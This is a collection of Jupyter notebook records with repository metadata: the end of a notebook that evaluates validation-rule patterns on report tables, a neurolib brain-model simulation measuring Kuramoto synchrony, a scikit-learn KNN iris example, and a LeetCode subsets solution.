"100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 212/212 [00:00<00:00, 502.85it/s]\n"
]
],
[
[
"### Open-axis tables",
"_____no_output_____"
],
[
"First find the patterns defined for open-axis tables",
"_____no_output_____"
]
],
[
[
"df_patterns_open_axis = df_patterns.copy()\ndf_patterns_open_axis = df_patterns_open_axis[df_patterns_open_axis['pandas ex'].apply(\n lambda expr: any(table in expr for table in tables_open_axis))]",
"_____no_output_____"
]
],
[
[
"Patterns involving multiple open-axis tables are not yet supported",
"_____no_output_____"
]
],
[
[
"df_patterns_open_axis = df_patterns_open_axis[df_patterns_open_axis['pandas ex'].apply(\n lambda expr: len(set(re.findall('S.\\d\\d.\\d\\d.\\d\\d.\\d\\d',expr)))) == 1]\ndf_patterns_open_axis.head()",
"_____no_output_____"
]
],
[
[
"Next we loop through the open-axis tables en evaluate the corresponding patterns on the data",
"_____no_output_____"
]
],
[
[
"output_open_axis = {} # dictionary with input and results per table\nfor table in tables_open_axis: # loop through open-axis tables\n if df_patterns_open_axis['pandas ex'].apply(lambda expr: table in expr).sum() > 0: # check if there are patterns\n info = {}\n info['data'] = dict_open_axis[table] # select data\n info['patterns'] = df_patterns_open_axis[df_patterns_open_axis['pandas ex'].apply(\n lambda expr: table in expr)] # select patterns\n miner = data_patterns.PatternMiner(df_patterns=info['patterns'])\n info['results'] = miner.analyze(info['data']) # evaluate patterns\n output_open_axis[table] = info",
"100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 4/4 [00:00<00:00, 666.45it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 2/2 [00:00<00:00, 666.61it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 4/4 [00:00<00:00, 666.45it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 4/4 [00:00<00:00, 666.61it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 1/1 [00:00<00:00, 499.92it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 9/9 [00:00<00:00, 642.70it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 3/3 [00:00<00:00, 599.79it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 7/7 [00:00<00:00, 636.27it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 6/6 [00:00<00:00, 599.89it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 5/5 [00:00<00:00, 615.76it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 4/4 [00:00<00:00, 571.45it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 7/7 [00:00<00:00, 636.20it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 5/5 [00:00<00:00, 555.42it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 2/2 [00:00<00:00, 666.71it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 5/5 [00:00<00:00, 624.84it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 3/3 [00:00<00:00, 499.82it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 3/3 [00:00<00:00, 428.41it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 3/3 [00:00<00:00, 499.90it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 3/3 [00:00<00:00, 428.43it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 2/2 [00:00<00:00, 400.03it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 3/3 [00:00<00:00, 499.86it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 3/3 [00:00<00:00, 
428.49it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 2/2 [00:00<00:00, 499.77it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 5/5 [00:00<00:00, 624.88it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 6/6 [00:00<00:00, 461.41it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 3/3 [00:00<00:00, 428.49it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 4/4 [00:00<00:00, 499.89it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 2/2 [00:00<00:00, 666.50it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 5/5 [00:00<00:00, 499.89it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 5/5 [00:00<00:00, 499.89it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 8/8 [00:00<00:00, 470.48it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 8/8 [00:00<00:00, 533.22it/s]\n100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 5/5 [00:00<00:00, 499.87it/s]\n"
]
],
[
[
"Print results for the first table (if there are rules for tables with an open axis)",
"_____no_output_____"
]
],
[
[
"if len(output_open_axis.keys()) > 0:\n display(output_open_axis[list(output_open_axis.keys())[0]]['results'].head())",
"_____no_output_____"
]
],
[
[
"## 6. Save results",
"_____no_output_____"
],
[
"### Combine results for closed- and open-axis tables",
"_____no_output_____"
],
[
"To output the results in a single file, we want to combine the results for closed-axis and open-axis tables",
"_____no_output_____"
]
],
[
[
"# Function to transform results for open-axis tables, so it can be appended to results for closed-axis tables\n# The 'extra' index columns are converted to data columns\ndef transform_results_open_axis(df):\n if df.index.nlevels > 2:\n reset_index_levels = list(range(2, df.index.nlevels))\n df = df.reset_index(level=reset_index_levels)\n rename_columns={}\n for x in reset_index_levels:\n rename_columns['level_' + str(x)] = 'id_column_' + str(x - 1)\n df.rename(columns=rename_columns, inplace=True)\n return df",
"_____no_output_____"
],
[
"df_results = df_results_closed_axis.copy() # results for closed axis tables\nfor table in list(output_open_axis.keys()): # for all open axis tables with rules -> append and sort results\n df_results = transform_results_open_axis(output_open_axis[table]['results']).append(df_results, sort=False).sort_values(by=['pattern_id']).sort_index()",
"_____no_output_____"
]
],
[
[
"Change column order so the dataframe starts with the identifying columns:",
"_____no_output_____"
]
],
[
[
"list_col_order = []\nfor i in range(1, len([col for col in list(df_results.columns) if col[:10] == 'id_column_']) + 1):\n list_col_order.append('id_column_' + str(i))\nlist_col_order.extend(col for col in list(df_results.columns) if col not in list_col_order)\ndf_results = df_results[list_col_order]\ndf_results.head()",
"_____no_output_____"
]
],
[
[
"### Save results",
"_____no_output_____"
],
[
"The dataframe df_results contains all output of the evaluation of the validation rules. ",
"_____no_output_____"
]
],
[
[
"# To save all results use df_results\n# To save all exceptions use df_results['result_type']==False \n# To save all confirmations use df_results['result_type']==True\n\n# Here we save only the exceptions to the validation rules\ndf_results[df_results['result_type']==False].to_excel(join(RESULTS_PATH, \"results.xlsx\"))",
"_____no_output_____"
]
],
[
[
"### Example of an error in the report",
"_____no_output_____"
]
],
[
[
"# Get the pandas code from the first pattern and evaluate it\ns = df_patterns.loc[4, 'pandas ex'].replace('df', 'df_closed_axis')\nprint('Pattern:', s)\ndisplay(eval(s)[re.findall('S.\\d\\d.\\d\\d.\\d\\d.\\d\\d,R\\d\\d\\d\\d,C\\d\\d\\d\\d',s)])",
"Pattern: df_closed_axis[~(df_closed_axis['S.01.02.01.01,R0100,C0010']=='REGULAR REPORTING')]\n"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb523ec409298f4c063e431d07919bd50b71dd59 | 3,965 | ipynb | Jupyter Notebook | connectivity/connectivity_dynamics.ipynb | vagechirkov/NI-project | fa0687d81ffad9b2e3737fe9115a151335bda358 | [
"MIT"
] | 1 | 2021-06-01T08:06:15.000Z | 2021-06-01T08:06:15.000Z | connectivity/connectivity_dynamics.ipynb | vagechirkov/NI-project | fa0687d81ffad9b2e3737fe9115a151335bda358 | [
"MIT"
] | null | null | null | connectivity/connectivity_dynamics.ipynb | vagechirkov/NI-project | fa0687d81ffad9b2e3737fe9115a151335bda358 | [
"MIT"
] | null | null | null | 23.052326 | 100 | 0.547037 | [
[
[
"import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport scipy\n\n# NB: add more subjects in the data folder in neurolib package\nfrom neurolib.utils.loadData import Dataset\nfrom neurolib.models.aln import ALNModel\n\nfrom coonectivity_dynamics import (plot_kuramoto_example, kuramoto,\n fast_kuramoto)\nplt.style.use('seaborn')\nsns.set_style(\"whitegrid\")\nsns.set_context(\"talk\")",
"_____no_output_____"
],
[
"ds = Dataset(\"gw\")\nmodel = ALNModel(Cmat=ds.Cmats[26], Dmat=ds.Dmats[26])\nmodel.params['dt'] = 0.1\nmodel.params['duration'] = 20 * 1000 # ms\n\n# add custom parameter for downsampling results\n# 10 ms sampling steps for saving data, should be multiple of dt\nmodel.params['save_dt'] = 10.0\nmodel.params[\"tauA\"] = 600.0\nmodel.params[\"sigma_ou\"] = 0.0\nmodel.params[\"b\"] = 20.0\n\nmodel.params[\"Ke_gl\"] = 300.0\nmodel.params[\"signalV\"] = 80.0\nmodel.params[\"mue_ext_mean\"] = 1.5\nmodel.params[\"mui_ext_mean\"] = 0.2\n",
"_____no_output_____"
],
[
"model.run()",
"_____no_output_____"
],
[
"model.default_output",
"_____no_output_____"
],
[
"plt.figure(figsize=(12, 6))\nplt.imshow(model.rates_exc[:, :10000], aspect='auto') # Aspect=1.2",
"_____no_output_____"
],
[
"plot_kuramoto_example(model.rates_exc[:4, 5000:15_000])",
"_____no_output_____"
]
],
[
[
"### Check the time profile of the kuramoto estimation function",
"_____no_output_____"
]
],
[
[
"from line_profiler import LineProfiler\nlp = LineProfiler()\nlp_wrapper = lp(kuramoto)\nkur = lp_wrapper(model.rates_exc[::10])\nlp.print_stats()",
"_____no_output_____"
],
[
"%%time\nkur1 = fast_kuramoto(model.rates_exc[::10][:, :10_000])\n",
"_____no_output_____"
],
[
"%%time\nkur2 = kuramoto(model.rates_exc[::10][:, :10_000])",
"_____no_output_____"
],
[
"np.corrcoef(kur1, kur2)",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
]
] |
cb52522b324d32157def332809616cb35ddcb4d5 | 3,808 | ipynb | Jupyter Notebook | codecheatsheet/a_basic_sample.ipynb | currypan/tb4 | 1f5206927205c5e9e83762c973680aa30194a357 | [
"MIT"
] | 6 | 2018-03-12T12:54:48.000Z | 2018-10-07T10:49:59.000Z | codecheatsheet/a_basic_sample.ipynb | currypan/tb4 | 1f5206927205c5e9e83762c973680aa30194a357 | [
"MIT"
] | 2 | 2018-03-24T12:27:29.000Z | 2018-03-24T14:44:50.000Z | codecheatsheet/a_basic_sample.ipynb | currypan/tb4 | 1f5206927205c5e9e83762c973680aa30194a357 | [
"MIT"
] | 2 | 2018-03-24T08:07:46.000Z | 2018-04-10T02:01:40.000Z | 19.04 | 174 | 0.501576 | [
[
[
"from sklearn import neighbors, datasets, preprocessing\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score",
"_____no_output_____"
],
[
"iris = datasets.load_iris()\nX, y = iris.data[:, :2], iris.target",
"_____no_output_____"
],
[
"print(X.shape)\nprint(y.shape)",
"(150, 2)\n(150,)\n"
],
[
"X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=33)",
"_____no_output_____"
],
[
"print(X_train.shape)\nprint(X_test.shape)\nprint(y_train.shape)\nprint(y_test.shape)",
"(112, 2)\n(38, 2)\n(112,)\n(38,)\n"
],
[
"print(X_train[0])\nprint(X_test[0])",
"[ 5. 2.3]\n[ 5.7 2.9]\n"
],
[
"scaler = preprocessing.StandardScaler().fit(X_train)",
"_____no_output_____"
],
[
"X_train = scaler.transform(X_train)\nX_test = scaler.transform(X_test)",
"_____no_output_____"
],
[
"print(X_train[0])\nprint(X_test[0])",
"[-0.91090798 -1.59761476]\n[-0.09752318 -0.32858743]\n"
],
[
"knn = neighbors.KNeighborsClassifier(n_neighbors=5)\nknn.fit(X_train, y_train)",
"_____no_output_____"
],
[
"y_pred = knn.predict(X_test)\naccuracy_score(y_test, y_pred)",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb5253e6ed3c2fbeeb114f546198c156d662ca6f | 992,479 | ipynb | Jupyter Notebook | notebooks/nbk03_trader_test01_all.ipynb | dwelcaslu/I2A2-FM-Naive-Trader | 1b1ea576d493a55c0363ec3f639b8b328e03cd87 | [
"MIT"
] | null | null | null | notebooks/nbk03_trader_test01_all.ipynb | dwelcaslu/I2A2-FM-Naive-Trader | 1b1ea576d493a55c0363ec3f639b8b328e03cd87 | [
"MIT"
] | null | null | null | notebooks/nbk03_trader_test01_all.ipynb | dwelcaslu/I2A2-FM-Naive-Trader | 1b1ea576d493a55c0363ec3f639b8b328e03cd87 | [
"MIT"
] | null | null | null | 420.72022 | 227,416 | 0.917464 | [
[
[
"import os, sys\nsys.path.append('../src/')\nimport warnings\nwarnings.filterwarnings('ignore')\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport plotly.graph_objects as go\n\nfrom sklearn.naive_bayes import GaussianNB\n\n# https://technical-analysis-library-in-python.readthedocs.io/en/latest/ta.html#trend-indicators\nimport ta\n\nimport indicators as ind\nimport arena as arn\nimport stockmarket as smkt",
"_____no_output_____"
],
[
"stock_data = pd.read_excel('../data/indicadores petrobras.xlsx')\nstock_data.index = stock_data['Data'].values\nstock_data = stock_data.sort_index()\nstock_data",
"_____no_output_____"
],
[
"# Calculating the stock market indicators:\nstock_data = ind.stock_preprocessing(stock_data)\nstock_data",
"_____no_output_____"
]
],
[
[
"# Data Preparation:",
"_____no_output_____"
]
],
[
[
"FEATURES_NAMES = ['macd', 'signal', 'histogram', 'williams_r']",
"_____no_output_____"
],
[
"data_train = stock_data[0:501].dropna()\ndata_train",
"_____no_output_____"
],
[
"data_test = stock_data[501:]\ndata_test",
"_____no_output_____"
],
[
"X_train = data_train[FEATURES_NAMES]\nX_train",
"_____no_output_____"
],
[
"X_test = data_test[FEATURES_NAMES]\nX_test",
"_____no_output_____"
]
],
[
[
"# Trading arena:",
"_____no_output_____"
]
],
[
[
"params = {'estimator': GaussianNB(),\n 'features_names': FEATURES_NAMES,\n 'initial_cash': data_train['Fech.'].values[0]*100,\n 'initial_stocks': 0,\n 'daily_negotiable_perc': 0.5,\n 'min_stocks_op': 1,\n 'broker_taxes': 0,\n }\narena = arn.TraderArena(target_names=[0, 1, 2], n_gens=1000, init_population=1000, n_mutations=100, train_size=0.6)\ngnb = arena.run(data_train, params)",
"Initial wealth: 661.0\nGeneration 1: train wealth 1491.87 valid wealth 1054.67\nGeneration 2: train wealth 1424.31 valid wealth 1063.26\nGeneration 3: train wealth 1398.12 valid wealth 1084.82\nGeneration 4: train wealth 1492.68 valid wealth 1097.53\nGeneration 5: train wealth 1387.59 valid wealth 1097.53\nGeneration 6: train wealth 1323.24 valid wealth 1097.53\nGeneration 7: train wealth 1348.44 valid wealth 1097.53\nGeneration 8: train wealth 1312.17 valid wealth 1129.24\nGeneration 9: train wealth 1293.89 valid wealth 1129.24\nGeneration 10: train wealth 1421.65 valid wealth 1135.73\nGeneration 11: train wealth 1371.58 valid wealth 1135.73\nGeneration 12: train wealth 1358.15 valid wealth 1143.23\nGeneration 13: train wealth 1431.98 valid wealth 1171.54\nGeneration 14: train wealth 1451.82 valid wealth 1171.54\nGeneration 15: train wealth 1409.63 valid wealth 1171.54\nGeneration 16: train wealth 1385.93 valid wealth 1171.54\nGeneration 17: train wealth 1436.34 valid wealth 1171.54\nGeneration 18: train wealth 1378.7 valid wealth 1171.54\nGeneration 19: train wealth 1339.36 valid wealth 1171.54\nGeneration 20: train wealth 1546.15 valid wealth 1171.54\nGeneration 21: train wealth 1350.43 valid wealth 1171.54\nGeneration 22: train wealth 1417.81 valid wealth 1171.54\nGeneration 23: train wealth 1488.41 valid wealth 1171.54\nGeneration 24: train wealth 1567.17 valid wealth 1171.54\nGeneration 25: train wealth 1365.66 valid wealth 1171.54\nGeneration 26: train wealth 1493.82 valid wealth 1171.54\nGeneration 27: train wealth 1659.64 valid wealth 1171.54\nGeneration 28: train wealth 1447.05 valid wealth 1171.54\nGeneration 29: train wealth 1355.59 valid wealth 1171.54\nGeneration 30: train wealth 1450.7 valid wealth 1171.54\nGeneration 31: train wealth 1421.55 valid wealth 1171.54\nGeneration 32: train wealth 1327.38 valid wealth 1180.23\nGeneration 33: train wealth 1380.62 valid wealth 1180.23\nGeneration 34: train wealth 1536.93 valid wealth 1180.23\nGeneration 35: train wealth 1382.83 valid wealth 1180.23\nGeneration 36: train wealth 1592.12 valid wealth 1180.23\nGeneration 37: train wealth 1386.96 valid wealth 1180.23\nGeneration 38: train wealth 1352.5 valid wealth 1192.3\nGeneration 39: train wealth 1391.37 valid wealth 1194.24\nGeneration 40: train wealth 1551.59 valid wealth 1194.24\nGeneration 41: train wealth 1368.88 valid wealth 1194.24\nGeneration 42: train wealth 1346.6 valid wealth 1194.24\nGeneration 43: train wealth 1364.84 valid wealth 1194.24\nGeneration 44: train wealth 1388.22 valid wealth 1194.24\nGeneration 45: train wealth 1378.74 valid wealth 1194.24\nGeneration 46: train wealth 1412.18 valid wealth 1194.24\nGeneration 47: train wealth 1296.67 valid wealth 1194.24\nGeneration 48: train wealth 1346.28 valid wealth 1194.24\nGeneration 49: train wealth 1319.36 valid wealth 1194.24\nGeneration 50: train wealth 1263.74 valid wealth 1194.24\nGeneration 51: train wealth 1347.74 valid wealth 1194.24\nGeneration 52: train wealth 1430.74 valid wealth 1194.24\nGeneration 53: train wealth 1345.12 valid wealth 1194.24\nGeneration 54: train wealth 1345.02 valid wealth 1194.24\nGeneration 55: train wealth 1350.36 valid wealth 1194.24\nGeneration 56: train wealth 1326.29 valid wealth 1194.24\nGeneration 57: train wealth 1326.08 valid wealth 1194.24\nGeneration 58: train wealth 1430.41 valid wealth 1194.24\nGeneration 59: train wealth 1527.52 valid wealth 1194.24\nGeneration 60: train wealth 1401.26 valid wealth 1194.24\nGeneration 61: train wealth 1355.65 valid wealth 
1194.24\nGeneration 62: train wealth 1544.25 valid wealth 1194.24\nGeneration 63: train wealth 1369.98 valid wealth 1194.24\nGeneration 64: train wealth 1390.66 valid wealth 1194.24\nGeneration 65: train wealth 1492.7 valid wealth 1194.24\nGeneration 66: train wealth 1372.71 valid wealth 1194.24\nGeneration 67: train wealth 1389.43 valid wealth 1194.24\nGeneration 68: train wealth 1398.7 valid wealth 1194.24\nGeneration 69: train wealth 1517.23 valid wealth 1194.24\nGeneration 70: train wealth 1440.24 valid wealth 1194.24\nGeneration 71: train wealth 1528.6 valid wealth 1194.24\nGeneration 72: train wealth 1439.49 valid wealth 1194.24\nGeneration 73: train wealth 1237.44 valid wealth 1194.24\nGeneration 74: train wealth 1310.29 valid wealth 1194.24\nGeneration 75: train wealth 1408.8 valid wealth 1194.24\nGeneration 76: train wealth 1294.07 valid wealth 1194.24\nGeneration 77: train wealth 1196.97 valid wealth 1194.24\nGeneration 78: train wealth 1439.9 valid wealth 1194.24\nGeneration 79: train wealth 1274.1 valid wealth 1194.24\nGeneration 80: train wealth 1359.71 valid wealth 1194.24\nGeneration 81: train wealth 1582.62 valid wealth 1194.24\nGeneration 82: train wealth 1403.61 valid wealth 1194.24\nGeneration 83: train wealth 1549.4 valid wealth 1194.24\nGeneration 84: train wealth 1294.1 valid wealth 1194.24\nGeneration 85: train wealth 1301.12 valid wealth 1194.24\nGeneration 86: train wealth 1305.06 valid wealth 1194.24\nGeneration 87: train wealth 1388.88 valid wealth 1207.32\nGeneration 88: train wealth 1461.17 valid wealth 1207.32\nGeneration 89: train wealth 1382.65 valid wealth 1207.32\nGeneration 90: train wealth 1457.49 valid wealth 1207.32\nGeneration 91: train wealth 1446.61 valid wealth 1207.32\nGeneration 92: train wealth 1345.02 valid wealth 1207.32\nGeneration 93: train wealth 1300.37 valid wealth 1207.32\nGeneration 94: train wealth 1254.9 valid wealth 1207.32\nGeneration 95: train wealth 1442.24 valid wealth 1207.32\nGeneration 96: train wealth 1586.78 valid wealth 1207.32\nGeneration 97: train wealth 1382.81 valid wealth 1207.32\nGeneration 98: train wealth 1469.61 valid wealth 1207.32\nGeneration 99: train wealth 1376.04 valid wealth 1207.32\nGeneration 100: train wealth 1503.63 valid wealth 1207.32\nGeneration 101: train wealth 1387.05 valid wealth 1207.32\nGeneration 102: train wealth 1229.18 valid wealth 1207.32\nGeneration 103: train wealth 1380.68 valid wealth 1207.32\nGeneration 104: train wealth 1450.77 valid wealth 1207.32\nGeneration 105: train wealth 1340.86 valid wealth 1207.32\nGeneration 106: train wealth 1360.11 valid wealth 1207.32\nGeneration 107: train wealth 1306.26 valid wealth 1207.32\nGeneration 108: train wealth 1451.48 valid wealth 1207.32\nGeneration 109: train wealth 1416.86 valid wealth 1207.32\nGeneration 110: train wealth 1320.16 valid wealth 1207.32\nGeneration 111: train wealth 1368.66 valid wealth 1207.32\nGeneration 112: train wealth 1608.56 valid wealth 1207.32\nGeneration 113: train wealth 1363.67 valid wealth 1207.32\nGeneration 114: train wealth 1324.56 valid wealth 1207.32\nGeneration 115: train wealth 1455.69 valid wealth 1207.32\nGeneration 116: train wealth 1320.25 valid wealth 1207.32\nGeneration 117: train wealth 1448.23 valid wealth 1207.32\nGeneration 118: train wealth 1398.66 valid wealth 1207.32\nGeneration 119: train wealth 1327.93 valid wealth 1207.32\nGeneration 120: train wealth 1417.09 valid wealth 1207.32\nGeneration 121: train wealth 1314.96 valid wealth 1207.32\nGeneration 122: train wealth 1329.87 valid wealth 
1207.32\nGeneration 123: train wealth 1376.82 valid wealth 1207.32\nGeneration 124: train wealth 1292.69 valid wealth 1207.32\nGeneration 125: train wealth 1367.34 valid wealth 1207.32\nGeneration 126: train wealth 1423.9 valid wealth 1207.32\nGeneration 127: train wealth 1350.26 valid wealth 1207.32\nGeneration 128: train wealth 1440.0 valid wealth 1207.32\nGeneration 129: train wealth 1583.13 valid wealth 1207.32\nGeneration 130: train wealth 1441.89 valid wealth 1207.32\nGeneration 131: train wealth 1358.29 valid wealth 1207.32\nGeneration 132: train wealth 1352.33 valid wealth 1207.32\nGeneration 133: train wealth 1294.62 valid wealth 1207.32\nGeneration 134: train wealth 1495.83 valid wealth 1207.32\nGeneration 135: train wealth 1464.7 valid wealth 1207.32\nGeneration 136: train wealth 1355.3 valid wealth 1207.32\nGeneration 137: train wealth 1400.06 valid wealth 1207.32\nGeneration 138: train wealth 1614.98 valid wealth 1207.32\nGeneration 139: train wealth 1383.85 valid wealth 1207.32\nGeneration 140: train wealth 1396.68 valid wealth 1207.32\nGeneration 141: train wealth 1399.94 valid wealth 1207.32\nGeneration 142: train wealth 1408.49 valid wealth 1207.32\nGeneration 143: train wealth 1495.03 valid wealth 1207.32\nGeneration 144: train wealth 1370.84 valid wealth 1207.32\nGeneration 145: train wealth 1367.24 valid wealth 1207.32\nGeneration 146: train wealth 1434.91 valid wealth 1207.32\nGeneration 147: train wealth 1402.67 valid wealth 1207.32\nGeneration 148: train wealth 1407.3 valid wealth 1207.32\nGeneration 149: train wealth 1312.79 valid wealth 1207.32\nGeneration 150: train wealth 1355.74 valid wealth 1207.32\nGeneration 151: train wealth 1336.19 valid wealth 1207.32\nGeneration 152: train wealth 1493.2 valid wealth 1207.32\nGeneration 153: train wealth 1325.03 valid wealth 1207.32\nGeneration 154: train wealth 1502.21 valid wealth 1207.32\nGeneration 155: train wealth 1498.67 valid wealth 1207.32\nGeneration 156: train wealth 1487.19 valid wealth 1207.32\nGeneration 157: train wealth 1282.43 valid wealth 1207.32\nGeneration 158: train wealth 1526.26 valid wealth 1207.32\nGeneration 159: train wealth 1402.07 valid wealth 1207.32\nGeneration 160: train wealth 1418.83 valid wealth 1207.32\nGeneration 161: train wealth 1455.69 valid wealth 1207.32\nGeneration 162: train wealth 1347.65 valid wealth 1207.32\nGeneration 163: train wealth 1434.79 valid wealth 1207.32\nGeneration 164: train wealth 1342.29 valid wealth 1207.32\nGeneration 165: train wealth 1355.88 valid wealth 1207.32\nGeneration 166: train wealth 1603.97 valid wealth 1207.32\nGeneration 167: train wealth 1481.14 valid wealth 1207.32\nGeneration 168: train wealth 1396.86 valid wealth 1207.32\nGeneration 169: train wealth 1381.95 valid wealth 1207.32\nGeneration 170: train wealth 1434.19 valid wealth 1207.32\nGeneration 171: train wealth 1516.17 valid wealth 1207.32\nGeneration 172: train wealth 1349.15 valid wealth 1207.32\nGeneration 173: train wealth 1555.36 valid wealth 1207.32\nGeneration 174: train wealth 1354.1 valid wealth 1207.32\nGeneration 175: train wealth 1335.0 valid wealth 1207.32\nGeneration 176: train wealth 1363.72 valid wealth 1207.32\nGeneration 177: train wealth 1463.06 valid wealth 1207.32\nGeneration 178: train wealth 1375.97 valid wealth 1207.32\nGeneration 179: train wealth 1502.21 valid wealth 1207.32\nGeneration 180: train wealth 1301.58 valid wealth 1207.32\nGeneration 181: train wealth 1407.86 valid wealth 1207.32\nGeneration 182: train wealth 1274.67 valid wealth 1207.32\nGeneration 
183: train wealth 1285.94 valid wealth 1207.32\nGeneration 184: train wealth 1373.1 valid wealth 1207.32\nGeneration 185: train wealth 1485.18 valid wealth 1207.32\nGeneration 186: train wealth 1498.89 valid wealth 1207.32\nGeneration 187: train wealth 1491.59 valid wealth 1207.32\n"
],
[
"arena.plot_evolution()",
"_____no_output_____"
]
],
[
[
"# Operating in the market:",
"_____no_output_____"
]
],
[
[
"# Train:\nmkt_op_train = smkt.MarkerOperator(gnb, FEATURES_NAMES, initial_cash=data_train['Fech.'].values[0]*100)\nop_results_train = mkt_op_train.run(data_train)\nop_results_train",
"_____no_output_____"
],
[
"mkt_op_train.plot_wealth()",
"_____no_output_____"
],
[
"mkt_op_train.plot_operations()",
"_____no_output_____"
],
[
"# Test:\nmkt_op_test = smkt.MarkerOperator(gnb, FEATURES_NAMES, initial_cash=data_test['Fech.'].values[0]*100)\nop_results_test = mkt_op_test.run(data_test)\nop_results_test",
"_____no_output_____"
],
[
"mkt_op_test.plot_wealth()",
"_____no_output_____"
],
[
"mkt_op_test.plot_operations()",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb5256149fa8766d5bff134dfc976b31d955f24b | 1,992 | ipynb | Jupyter Notebook | 078. Subsets.ipynb | sppool/LeetCode | e1c94cacf2ecc848dfa32d8e7691c0939a896f86 | [
"MIT"
] | null | null | null | 078. Subsets.ipynb | sppool/LeetCode | e1c94cacf2ecc848dfa32d8e7691c0939a896f86 | [
"MIT"
] | null | null | null | 078. Subsets.ipynb | sppool/LeetCode | e1c94cacf2ecc848dfa32d8e7691c0939a896f86 | [
"MIT"
] | null | null | null | 20.536082 | 93 | 0.429719 | [
[
[
"### Subsets",
"_____no_output_____"
]
],
[
[
"Given a set of distinct integers, nums, return all possible subsets (the power set).\nNote: The solution set must not contain duplicate subsets.\n\nExample:\nInput: nums = [1,2,3]\nOutput:\n[ [3],\n [1],\n [2],\n [1,2,3],\n [1,3],\n [2,3],\n [1,2],\n [] ]",
"_____no_output_____"
]
],
[
[
"class Solution: # 68.37%\n def subsets(self, nums):\n if nums == []: return[[]]\n lst = [[]]\n for num in nums:\n lst = self.plus_num(lst, [[num], []])\n return lst\n\n def plus_num(self, o_lst, p_lst):\n lst = []\n for ls in o_lst:\n for ls2 in p_lst:\n lst.append(ls+ls2)\n return lst",
"_____no_output_____"
],
[
"nums = [1, 2, 3]\nans = Solution()\nans.subsets(nums)",
"_____no_output_____"
]
]
] | [
"markdown",
"raw",
"code"
] | [
[
"markdown"
],
[
"raw"
],
[
"code",
"code"
]
] |
